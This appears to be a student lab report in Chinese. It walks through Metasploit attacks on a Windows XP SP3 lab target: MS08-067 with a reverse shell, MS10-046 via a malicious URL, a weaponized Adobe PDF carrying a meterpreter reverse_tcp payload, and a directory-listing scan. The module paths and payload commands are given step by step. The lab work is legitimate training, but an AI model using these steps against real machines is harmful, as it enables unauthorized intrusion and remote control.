一、用本身的話解釋什麼是exploit,payload,encode?shell
msf僅僅是一個攻擊平臺,攻擊具體的實現仍是要靠抓住靶機上的漏洞進行。本次實驗我對metasploit的體系結構有了初步的認識。尤爲是對6個主要模塊的功能和用途有了深刻理解和實踐經驗。我也深入的認識到在現實中想要真正攻陷一臺靶機仍是有難度的,由於本次實驗我使用的靶機是win xp sp3英文版系統。很老,應該算是被淘汰的了,因此纔會有那麼多漏洞讓我能夠抓住去攻擊,如今windows版本不斷更新,漏洞補丁的更新速度也愈來愈快,所以更體現出了0 day漏洞的價值。windows
攻擊機:Kali(IP:192.168.248.128)api
靶機:Windows XP SP3(IP:192.168.248.129)瀏覽器
一、先用search ms08_067指令查詢該攻擊模塊。網絡
二、輸入use exploit/windows/smb/ms08_067_netapi使用該模塊,並用show payloads指令查看一下要用的payload。session
三、輸入set payload generic/shell_reverse_tcp設置一下payload,經過反向鏈接獲取shell。tcp
四、使用show options指令查看須要進行的配置。編碼
五、如圖所示進行配置,設置RHOST爲遠程靶機IP地址、LHOST爲主機IP地址。url
六、設置完成後再次確認剛纔的設置。3d
七、輸入exploit發起攻擊。
八、攻擊成功,成功獲取靶機系統shell。
一、先利用search ms10_046指令查看能夠運用的攻擊模塊.
二、使用該漏洞進行攻擊。
三、設置相關參數。SRVHOST是本地監聽主機的IP地址,LHOST是監聽的IP地址,都填攻擊者本機IP地址。
四、發起攻擊,能夠看到,生成了url連接地址。
五、咱們使用靶機的IE瀏覽器登錄一下剛纔生成的url地址。
六、發現主機這邊已經攻擊成功了。
七、使用命令sessions -i 1開始鏈接,成功獲得shell。
一、進入文件攻擊目錄選擇一個合適的adobe漏洞。
二、我選擇的是adobe_pdf_embedded_exe,use這個漏洞。
三、設置一下payload攻擊有效載荷:set payload windows/meterpreter/reverse_tcp
四、show options查看須要進行哪些配置。
五、設置文件名稱5239.pdf,LHOST爲攻擊者主機IP。
六、再次使用show options檢查配置。
七、發起攻擊。發現生成了一個名爲5239的pdf文件。
八、把攻擊主機設置爲監聽狀態,方法和之前的實驗相似。
九、將該pdf拷貝到靶機上而後打開。
十、攻擊機已經成功獲取到靶機shell。
一、先用search瞭解一下有關scanner/http/dir_listing的相關信息。
二、設置相關參數。
三、run,運行成功。